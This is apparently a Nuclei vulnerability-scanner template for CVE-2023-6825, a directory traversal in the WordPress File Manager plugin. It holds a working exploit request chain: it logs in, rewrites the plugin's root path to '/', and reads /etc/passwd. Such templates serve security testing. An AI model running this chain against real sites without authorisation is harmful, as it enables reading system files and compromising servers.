WordPress File Manager <= 7.2.1 - Directory Traversal

id: CVE-2023-6825

info:
  name: WordPress File Manager <= 7.2.1 - Directory Traversal
  author: pussycat0x
  severity: critical
  description: |
    File Manager and File Manager Pro plugins for WordPress versions up to 7.2.1 and 8.3.4 contain a directory traversal caused by the 'target' parameter in mk_file_folder_manager_action_callback_shortcode, letting attackers read arbitrary files and upload files outside designated directories, exploit requires administrator privileges for free version and can be exploited by lower-level users in Pro version.
  impact: |
    Attackers can read sensitive files and upload files outside permitted directories, potentially leading to information disclosure and server compromise.
  remediation: |
    Update to the latest versions of the plugins, beyond 7.2.1 for free and 8.3.4 for Pro, or disable the plugins until patched.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804
    - https://plugins.trac.wordpress.org/changeset/3023403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.9
    cve-id: CVE-2023-6825
    epss-score: 0.66498
    epss-percentile: 0.98551
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: mndpsingh287
    product: file-manager
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-file-manager"
  tags: cve,cve2023,wordpress,wp-plugin,wp-file-manager,lfi

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "File Manager")'
          - 'compare_versions(version, "<= 7.2.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        public_path=%2F&wp_filemanager_root_nonce_field={{pref_nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp_file_manager_preferences&submit=Save+Changes

      - |
        GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA&_wpnonce={{fm_nonce}}

    redirects: true
    max-redirects: 3

    extractors:
      - type: regex
        name: pref_nonce
        part: body_2
        group: 1
        regex:
          - 'wp_filemanager_root_nonce_field"[^>]*value="([a-f0-9]+)"'
        internal: true

      - type: regex
        name: fm_nonce
        part: body_4
        group: 1
        regex:
          - '"nonce"\s*:\s*"([a-f0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_5 == 200'
          - 'regex("root:.*:0:0:", body_5)'
        condition: and
# digest: 4b0a00483046022100f94720db7f27935136c75c3e9b6c3747fae63e3fd080fe32efd7267670077b1d022100c211a9b513ad8ea6ab124e0632029df7b2d0b50831a5dd5df168259c0d7897e1:922c64590222798bb761d5b6d8e72950